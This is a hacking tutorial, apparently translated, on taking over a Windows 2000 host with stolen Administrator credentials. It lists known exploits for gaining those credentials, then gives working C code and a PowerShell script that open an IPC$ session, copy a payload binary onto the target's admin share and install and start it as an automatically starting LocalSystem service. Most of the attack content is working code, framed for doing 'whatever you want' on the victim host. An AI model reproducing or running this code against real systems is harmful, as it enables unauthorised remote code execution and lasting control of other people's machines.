How do you establish an IPC connection? No need to tell you, everyone knows:
NET USE \\IP\IPC$ password /USER:user
The real problem is getting an account with Administrator rights and its password. There are many ways:
(1) Stream scanning
(2) The IIS .printer buffer overflow
(3) MS SQL empty password
(4) The Unicode vulnerability
(5) The remote Terminal Services input method (IME) vulnerability
(6) The IDQ.dll vulnerability
... and many more! I won't go into the specific methods.
What can you do once you have Windows 2K Administrator rights? Whatever you want! What's the natural thing to do? Start a service, of course, a service program you wrote yourself! How? Below I'll talk about it from the programming side. The reader should have some background in network programming. In some places I have left out error checking, and some of the code borrows from others. Please refer to MSDN for the functions and structures used. For anything that is lacking, work it out for yourself, or contact me: Heavyd@cngale.com. Read on:
1. How to establish an IPC connection, see the following code (WNetAddConnection2 lives in mpr.lib, so link against it):

#include <windows.h>
#include <winnetwk.h>
#include <stdio.h>
#include <string.h>

BOOL ConnectIPC(char *RemoteName, char *User, char *Password)
{
    char tmp[128] = "";
    NETRESOURCE NetResource;
    // Build "\\host\IPC$"; RemoteName is passed as "\\host".
    // snprintf instead of strcat so a long host name cannot overflow tmp.
    snprintf(tmp, sizeof(tmp), "%s\\IPC$", RemoteName);
    ZeroMemory(&NetResource, sizeof(NetResource));
    NetResource.dwType       = RESOURCETYPE_ANY;
    NetResource.lpLocalName  = NULL;   // no drive letter, only the IPC$ session
    NetResource.lpRemoteName = tmp;
    NetResource.lpProvider   = NULL;
    // Establish the connection; NO_ERROR means the logon succeeded
    // (the original returned FALSE on success, which was backwards)
    if (WNetAddConnection2(&NetResource, Password, User, FALSE) == NO_ERROR)
        return TRUE;
    return FALSE;
}
Isn't it simple? Right! It's that simple! On to the next step!
2. Write the program file to the target host!
BOOL SendFile(char *RemotePathAndFile)
{
    HANDLE hrf;
    // The bytes of the service program to drop on the target; fill in your own, e.g. "\x90\x90"
    unsigned char shellcode[] = "Write code here, such as \x90\x90";
    DWORD writtenSize = 0;
    DWORD length = sizeof(shellcode);
    // Create (or overwrite) the file through the admin share, e.g. "\\host\admin$\x.exe"
    hrf = CreateFile(RemotePathAndFile, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
                     CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hrf == INVALID_HANDLE_VALUE) return FALSE;
    // Write the whole buffer in one call instead of one byte at a time
    if (!WriteFile(hrf, shellcode, length, &writtenSize, NULL) || writtenSize != length) {
        CloseHandle(hrf);
        return FALSE;
    }
    CloseHandle(hrf);
    printf("Send file success!\n");
    return TRUE;
}
3. Almost there, the last step: start the service!
Steps: a. open the Service Control Manager (SCM) with OpenSCManager and get an SC_HANDLE, hscm;
b. CreateService, which also returns an SC_HANDLE, hscs; c. StartService;
d. by the way, ControlService lets you control the state of the service,
for example: ControlService(hscs, SERVICE_CONTROL_STOP, NULL);
// stop the service
ControlService(hscs, SERVICE_CONTROL_PAUSE, NULL);
// pause the service
One caveat: the file you dropped in step 2 must be a real service program, i.e. one that calls StartServiceCtrlDispatcher and reports its state to the SCM. An ordinary console EXE never connects to the SCM, so StartService fails with error 1053 (the service did not respond in a timely fashion) and the process is killed.
Please see the following code:
BOOL InstallService(char *Target, char *ServiceName, char *FileName)
{
    SC_HANDLE hscm = NULL, hscs = NULL;
    SERVICE_STATUS ServiceStatus;
    BOOL ok = FALSE;
    ZeroMemory(&ServiceStatus, sizeof(ServiceStatus));
    // Target is "\\host"; this needs the Administrator IPC$ session from step 1
    hscm = OpenSCManager(Target, NULL, SC_MANAGER_ALL_ACCESS);
    if (hscm == NULL) return FALSE;
    hscs = CreateService(hscm,                      // SCM handle
                         ServiceName,               // service name
                         ServiceName,               // display name
                         SERVICE_ALL_ACCESS,        // desired access
                         SERVICE_WIN32_OWN_PROCESS, // service type
                         SERVICE_AUTO_START,        // start automatically at boot
                         SERVICE_ERROR_IGNORE,      // ignore start errors
                         FileName,                  // path of the binary on the target, e.g. "C:\\WINNT\\x.exe"
                         NULL,                      // load ordering group
                         NULL,                      // tag identifier
                         NULL,                      // dependencies
                         NULL,                      // account (NULL = LocalSystem)
                         NULL);                     // password
    if (hscs == NULL) { CloseServiceHandle(hscm); return FALSE; }
    if (StartService(hscs, 0, NULL)) {              // no command-line arguments
        Sleep(30);                                  // give the service a moment to start
        // Poll until the service leaves START_PENDING
        while (QueryServiceStatus(hscs, &ServiceStatus)) {
            if (ServiceStatus.dwCurrentState == SERVICE_START_PENDING)
                Sleep(30);
            else
                break;
        }
        if (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
            ok = TRUE;
    }
    CloseServiceHandle(hscs);
    CloseServiceHandle(hscm);
    return ok;
}
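The same three steps as a practitioner would type them today on a Windows host, as an added example (not the article's own code): the IPC$ session, dropping the binary over ADMIN$, CreateService/StartService through sc.exe, the QueryServiceStatus polling loop, and the stop/delete clean-up the article only mentions. Target address, account, service name and binary path are placeholders for a lab you own; the binary must be a real service EXE, and the path assumes the default system root (C:\Windows; on Windows 2000 it is C:\WINNT).

```powershell
# Added example, not the article's code. Placeholders: Target, User, ServiceName, LocalExe.
param(
    [string]$Target      = '192.0.2.10',        # placeholder lab host (TEST-NET-1 address)
    [string]$User        = 'Administrator',
    [string]$ServiceName = 'labsvc',            # placeholder service name
    [string]$LocalExe    = 'C:\lab\labsvc.exe'  # must call StartServiceCtrlDispatcher
)
$ErrorActionPreference = 'Stop'
$cred = Get-Credential -UserName $User -Message "Administrator password for $Target"
$pw   = $cred.GetNetworkCredential().Password

# Step 1: IPC$ session, same as NET USE \\IP\IPC$ password /USER:user
& net.exe use "\\$Target\IPC`$" $pw "/USER:$User" | Out-Null
if ($LASTEXITCODE -ne 0) { throw "IPC`$ connection to $Target failed" }

try {
    # Step 2: copy the service binary over the ADMIN$ share (= %SystemRoot%)
    $exeName    = Split-Path -Leaf $LocalExe
    Copy-Item -Path $LocalExe -Destination "\\$Target\ADMIN`$\$exeName"
    $remotePath = "C:\Windows\$exeName"   # path as the target's SCM sees it (assumes default SystemRoot)

    # Step 3: CreateService + StartService via sc.exe (the space after 'binPath=' is required).
    # The article uses auto start; 'demand' keeps a lab service from surviving a reboot.
    & sc.exe "\\$Target" create $ServiceName "binPath= $remotePath" "start= demand" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "CreateService failed (exit $LASTEXITCODE)" }
    & sc.exe "\\$Target" start $ServiceName | Out-Null
    # 1053 here means the EXE never connected to the SCM (not a real service program)
    if ($LASTEXITCODE -ne 0) { throw "StartService failed (exit $LASTEXITCODE)" }

    # Equivalent of the QueryServiceStatus loop: poll until it leaves START_PENDING
    $state = 'START_PENDING'
    for ($i = 0; $i -lt 20 -and $state -eq 'START_PENDING'; $i++) {
        Start-Sleep -Milliseconds 500
        $q = (& sc.exe "\\$Target" query $ServiceName) -join "`n"
        if ($q -match 'STATE\s*:\s*\d+\s+(\w+)') { $state = $Matches[1] }
    }
    if ($state -ne 'RUNNING') { throw "service ended in state $state" }
    Write-Host "$ServiceName is RUNNING on $Target"

    # ControlService(SERVICE_CONTROL_STOP), then remove the service and the file
    & sc.exe "\\$Target" stop   $ServiceName | Out-Null
    & sc.exe "\\$Target" delete $ServiceName | Out-Null
    Remove-Item "\\$Target\ADMIN`$\$exeName"
}
finally {
    # Drop the IPC$ session whether or not the steps above succeeded
    & net.exe use "\\$Target\IPC`$" /delete /y | Out-Null
}
```

Every call here goes through the same SCM and admin-share paths as the C code above, so on the target it leaves the same traces: a network logon, a file written under the system root, and a new service registered and started.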
OK, once these three steps are done you can sit back and enjoy the fruits of your labour!
Note: the programs above are for reference only. Please turn them into a complete program based on your own understanding; don't just copy them as they are!